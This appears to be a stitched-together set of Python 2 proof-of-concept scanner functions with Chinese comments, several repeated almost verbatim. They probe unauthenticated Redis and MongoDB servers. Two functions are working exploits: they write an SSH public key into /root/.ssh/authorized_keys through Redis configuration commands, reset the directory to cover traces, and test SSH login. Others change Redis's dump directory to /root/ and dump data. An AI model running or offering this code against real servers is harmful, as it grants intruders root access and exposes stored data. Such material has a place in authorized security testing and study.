def poc(url):
url = host2IP(url)
ip = url.split(':')[0]
port = int(url.split(':')[-1]) if ':' in url else 6379
for web_port in [80, 443, 8080, 8443]: # 判断web服务
if checkPortTcp(ip, web_port):
try:
real_url = redirectURL(ip + ':' + str(web_port))
except Exception:
real_url = ip + ':' + str(web_port)
break # TODO 这里简单化处理,只返回了一个端口的结果
else:
return False
try:
r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
if 'redis_version' not in r.info(): # 判断未授权访问
return False
key = randomString(5)
value = randomString(5)
r.set(key, value) # 判断可写
r.config_set('dir', '/root/') # 判断对/var/www的写入权限(目前先判断为root)
r.config_set('dbfilename', 'dump.rdb') # 判断操作权限
r.delete(key)
r.save() # 判断可导出
except Exception, e:
return False
def poc(url):
url = host2IP(url)
ip = url.split(":")[0]
port = int(url.split(":")[-1]) if ":" in url else 6379
for web_port in [80, 443, 8080, 8443]: # 判断web服务
if checkPortTcp(ip, web_port):
try:
real_url = redirectURL(ip + ":" + str(web_port))
except Exception:
real_url = ip + ":" + str(web_port)
break # TODO 这里简单化处理,只返回了一个端口的结果
else:
return False
try:
r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
if "redis_version" not in r.info(): # 判断未授权访问
return False
key = randomString(5)
value = randomString(5)
r.set(key, value) # 判断可写
r.config_set("dir", "/root/") # 判断对/var/www的写入权限(目前先判断为root)
r.config_set("dbfilename", "dump.rdb") # 判断操作权限
r.delete(key)
r.save() # 判断可导出
except Exception, e:
return False
def poc(url):
url = host2IP(url)
ip = url.split(':')[0]
try:
if not checkPortTcp(ip,27017):
return False
if testConnect(ip,27017):
return ip
except Exception,e:
return False
def poc(url):
ip = host2IP(url).split(':')[0]
port = 27017
try:
if not checkPortTcp(ip, port):
return False
conn = pymongo.MongoClient(ip, port, socketTimeoutMS=3000)
dbs = conn.database_names()
return ip + ' -> ' + '|'.join(dbs) if dbs else False
except Exception:
return False
def poc(url):
url = host2IP(url)
ip = url.split(':')[0]
port = int(url.split(':')[-1]) if ':' in url else 6379
try:
if not checkPortTcp(ip, 22):
return False
r = redis.Redis(host=ip, port=port, db=0)
if 'redis_version' in r.info():
key = randomString(10)
r.set(key, '\n\n' + public_key + '\n\n')
r.config_set('dir', '/root/.ssh')
r.config_set('dbfilename', 'authorized_keys')
r.save()
r.delete(key) # 清除痕迹
r.config_set('dir', '/tmp')
time.sleep(5)
if testConnect(ip, 22):
return True
except Exception, e:
# print e
return False
def poc(url):
url = host2IP(url)
ip = url.split(':')[0]
port = int(url.split(':')[-1]) if ':' in url else 6379
try:
if not checkPortTcp(ip, 22):
return False
r = redis.Redis(host=ip, port=port, db=0)
if 'redis_version' in r.info():
key = randomString(10)
r.set(key, '\n\n' + public_key + '\n\n')
r.config_set('dir', '/root/.ssh')
r.config_set('dbfilename', 'authorized_keys')
r.save()
r.delete(key) # 清除痕迹
r.config_set('dir', '/tmp')
time.sleep(5)
if testConnect(ip, 22):
return True
except Exception:
return False
return False
